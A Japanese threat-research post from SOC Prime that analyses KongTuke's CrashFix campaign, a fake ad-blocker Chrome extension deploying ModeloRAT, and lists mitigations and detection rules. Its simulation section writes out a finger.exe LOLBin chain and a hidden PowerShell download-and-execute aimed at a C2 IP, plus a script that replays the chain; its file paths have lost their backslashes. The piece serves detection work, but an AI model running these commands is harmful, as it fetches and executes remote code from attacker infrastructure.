SOC Prime Bias: クリティカル

21 Jan 2026 16:34 UTC

CrashFixの解剖:KongTukeの新しいおもちゃ

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon フォローする
CrashFixの解剖:KongTukeの新しいおもちゃ
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

KongTukeは、uBlock Origin Liteを模倣した悪意のあるChrome拡張機能、NexShieldを配布しました。インストールされると、「CrashFix」セキュリティ警告を表示し、正当なブラウザセキュリティインシデントをシミュレートし、ブラウザをクラッシュさせて、ユーザーをクリップボードにコピーされた悪意のあるPowerShellコマンドを実行するよう強要します。このキャンペーンは、ドメインに参加しているシステムにPython RATのModeloRATを配備し、スタンドアロンホスト上で多段階のPowerShellチェーンを展開します。

調査

Huntressのアナリストは、拡張機能のコードを確認し、nexsnield.comへのコマンドアンドコントロールをリンクし、ペイロードをリバースエンジニアリングしました。彼らは、攻撃者の指示を取得するためにLOLBinとしてfinger.exeを悪用していること、及び .top ドメインを生成するDGA(ドメイン生成アルゴリズム)を観察しました。ドメイン環境については、研究者はHKCU Runキーによって維持されているRC4で暗号化されたPythonインプラントを確認しました。追加の手法として、解析防止チェック、 AMSIのバイパス、およびユーザーに迅速な完全コンプライアンスを強いるためのリソース枯渇戦術などが含まれていました。

緩和策

Chrome拡張機能IDをブロックし、人気のある広告ブロッカーを装う未知の拡張機能を監視します。nexsnield.comへのビーコン、C2 IP、およびDGAで生成されたドメインを検出します。LOLBinの使用を制限するために実行制御を適用し、特に広く使用されているソフトウェアを装った名前に注意して不審なRunキー値を警告します。

対応策

NexShield関連の拡張機能のインストールについてアラートを上げ、特定されたC2およびDGAインフラへのアウトバウンド接続と相関させます。影響を受けたホストを隔離し、拡張機能のアーティファクト、レジストリRunキー、スケジュールされたタスク、およびドロップされたファイルを収集します。ModeloRATの永続性を除去し、PowerShellステージコンポーネントを根絶し、エンドポイントを修復して検証します。

攻撃フロー

検出

PowerShellからの疑わしい.NETメソッド呼び出し(PowerShell経由)

SOC Prime チーム
2026年1月21日

疑わしいCURLの使用(cmdline経由)

SOC Prime チーム
2026年1月21日

短いファイル名(cmdline経由)

SOC Prime チーム
2026年1月21日

珍しいフォルダで手動またはスクリプト操作が行われた可能性があります(cmdline経由)

SOC Prime チーム
2026年1月21日

疑わしいPowerShell文字列(PowerShell経由)

SOC Prime チーム
2026年1月21日

PowerShellからの疑わしいWindows API関数の呼び出し(PowerShell経由)

SOC Prime チーム
2026年1月21日

持続性のポイントの可能性 [ASEPs – Software/NTUSERハイブ](レジストリエベント経由)

SOC Prime チーム
2026年1月21日

PowerShellを使用して疑わしいディレクトリにアーカイブが抽出されました(PowerShell経由)

SOC Prime チーム
2026年1月21日

疑わしいフォルダからのPythonの実行(cmdline経由)

SOC Prime チーム
2026年1月21日

PowerShell難読化の指標の可能性(PowerShell経由)

SOC Prime チーム
2026年1月21日

システム列挙の可能性(cmdline経由)

SOC Prime チーム
2026年1月21日

PowerShellによるダウンロードまたはアップロード(cmdline経由)

SOC Prime チーム
2026年1月21日

検知するためのIOC(ソースIP): CrashFixを解剖する: KongTukeの新しいオモチャ

SOC Prime AI Rules
2026年1月21日

検知するためのIOC(HashSha256): CrashFixを解剖する: KongTukeの新しいオモチャ

SOC Prime AI Rules
2026年1月21日

検知するためのIOC(宛先IP): CrashFixを解剖する: KongTukeの新しいオモチャ

SOC Prime AI Rules
2026年1月21日

検知するための IOC(メール): CrashFixを解剖する: KongTukeの新しいオモチャ

SOC Prime AI Rules
2026年1月21日

KongTuke CrashFixの悪意のあるコマンド実行を検出 [Windowsプロセス作成]

SOC Prime AI Rules
2026年1月21日

AMSIバイパスと証拠除去のPowerShellによる検出 [Windows PowerShell]

SOC Prime AI Rules
2026年1月21日

シミュレーション実行

前提条件: テレメトリーとベースライン事前フライトチェックが合格している必要があります。

根拠: このセクションでは、検出ルールをトリガーするよう設計された敵の手法(TTP)の正確な実行を詳述します。コマンドと叙述は識別されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目指します。

  • 攻撃の説明とコマンド:
    敵は最初に正当な finger.exe バイナリを一時ディレクトリにコピーし、 ct.exeにリネームしてから、階層化された cmd /c チェーンを使用して、リモートC2サーバー(199.217.98.108)に接続する引数を与えてコピーしたバイナリを呼び出します。バイナリはペイロードをコマンドラインにストリーミングし、それが2つ目の非表示の cmd によって受信コードを実行します。その後、攻撃者はPowerShellを利用して、 Invoke‑WebRequest を通じて2次ペイロードをダウンロードし、 iexで即座に実行します。全てのステップはユーザー検出を回避するために最小限のUI(/min)で実行されます。

     1. finger.exeを%TEMP%にコピー → ct.exe
      2. 実行: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"
      3. PowerShellで2次ペイロードをダウンロードし実行:
         powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content"
  • 回帰テストスクリプト: 以下のスクリプトは、Windowsのテストマシン上での攻撃チェーン全体を再現します。管理者権限のあるPowerShellセッションで実行してください。

    #-------------------------------------------------
    # KongTuke CrashFix の悪意のあるコマンド実行
    #-------------------------------------------------
    # 1. LOLBin(finger.exe)を%TEMP%にct.exeとして配置
    $fingerPath = "$env:windirsystem32finger.exe"
    $tempExe    = "$env:TEMPct.exe"
    Copy-Item -Path $fingerPath -Destination $tempExe -Force
    
    # 2. 悪意のあるcmdチェーンを実行(Sigmaルールに対応)
    $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"'
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden
    
    # 3. PowerShellによるウェブダウンロードと2次ペイロードの実行
    $payloadUrl = 'http://199.217.98.108/payload.ps1'
    $psCommand  = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden
    #-------------------------------------------------
  • クリーンアップコマンド: テストによって作成されたアーティファクトを削除し、残っているプロセスを終了します。

    # コピーしたct.exeを削除
    Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue
    
    # テストによって開始されたcmd.exeやpowershell.exeプロセスを終了(特定のコマンドラインでフィルタリング)
    Get-WmiObject Win32_Process |
        Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } |
        ForEach-Object { $_.Terminate() }
    
    # 必要に応じて、イベントログをクリアして再現性を確保します
    # wevlutil cl Security